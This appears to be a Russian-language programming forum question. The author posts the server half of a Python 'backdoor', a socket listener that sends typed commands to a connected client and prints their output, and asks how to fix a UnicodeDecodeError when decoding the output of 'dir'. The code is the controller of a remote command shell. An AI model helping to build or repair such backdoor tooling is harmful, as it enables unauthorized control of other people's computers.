# backdoor на python: ошибка, которую я не знаю как решить

Tags: python

ошибка в коде на server.py, на 28-29 строке

```
# Imports
import socket

# Creating Listening Port
HOST = '127.0.0.1' # '192.168.43.82'
PORT = 8081 # 2222

new_port = input('Input Host Port (Blank if default).')
if (new_port != "\n"):
    REMOTE_PORT = new_port

server = socket.socket()
server.bind((HOST, PORT))

# Starting Server
print('[+] Server Started')
print('[+] Listening For Client Connection ...')
server.listen(1)
client, client_addr = server.accept()
print(f'[+] {client_addr} Client connected to the server')

# Reciving Commands
while True:
    command = input('Enter Command : ')
    command = command.encode()
    client.send(command)
    print('[+] Command sent')
    output = client.recv(1024) # здесь ошибка
    output = output.decode() # и сдесь
    print(f"Output: {output}")
```

ну и вот сама ошибка когда я прописываю команду dir:

```
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xff in position 357: invalid start byte
```